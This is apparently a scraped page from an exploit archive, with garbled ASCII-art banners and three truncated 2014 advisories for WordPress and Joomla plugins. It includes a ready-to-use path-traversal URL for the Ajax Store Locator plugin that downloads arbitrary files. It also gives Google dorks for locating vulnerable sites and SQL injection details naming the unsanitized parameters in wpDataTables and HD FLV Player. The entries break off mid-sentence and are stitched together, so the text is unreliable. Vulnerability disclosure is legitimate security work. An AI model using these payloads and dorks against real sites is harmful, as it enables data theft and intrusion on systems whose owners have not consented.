___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | ______ |__| __ __
|::.|:. | | _ \ .-----.--.--.--.-----| .-----.---.-.--| |
`--- ---' |. | \| _ | | | | | | _ | _ | _ |
|. | |_____|________|__|__|__|_____|___._|_____|
|: 1 / ___ ___
|::.. ....
___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ _______ _______ __ | Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------. |. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | | |. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__| |: |: | |: 1 |_____| |__| |::....
######################
# Exploit Title : WordPress Ajax Store Locator <= 1.2 Arbitrary File Download
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
# Software Link : Premium
# Dork Google: inurl:ajax-store-locator
# index of ajax-store-locator # Date : 2014-12-06
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
######################
# PoC Exploit:
http://TARGET/wp-content/plugins/ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile]
or
http://TARGET/wp-content/plugins/codecanyon-5293356-ajax-store-locator-wordpress/sl_file_download.php?download_file=[../../nomefile]
"download_file" variable is not sanitized.
#####################
Discovered By : Claudio Viviani
http://www....
######################
# Exploit Title : WordPress wpDataTables 1.5.3 and below SQL Injection Vulnerability
# Exploit Author : Claudio Viviani # Software Link : http://wpdatatables.com (Premium)
# Date : 2014-11-22
# Tested on : Windows 7 / Mozilla Firefox
Windows 7 / sqlmap (0.8-1)
Linux / Mozilla Firefox
Linux / sqlmap 1.0-dev-5b2ded0
######################
# Description
Wordpress wpDataTables 1.5.3 and below suffers from SQL injection vulnerability
"table_id" variable is not sanitized.
File: wpdatatables....
Info # Exploit Title : Joomla HD FLV Player 2.1.0.1 and below SQL Injection
#
# Exploit Author : Claudio Viviani
#
# Vendor Homepage : http://www.hdflvplayer.net/
#
# Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
#
# Dork google 1: inurl:/component/hdflvplayer/
# Dork google 2: inurl:com_hdflvplayer #
# Date : 2014-11-11
#
# Tested on : BackBox 3.x/4.x
#
# Info: The variable "id" is not sanitized (again)
# Over 80.000 downloads (statistic reported on official site)
#
#
# Video Demo: http://youtu....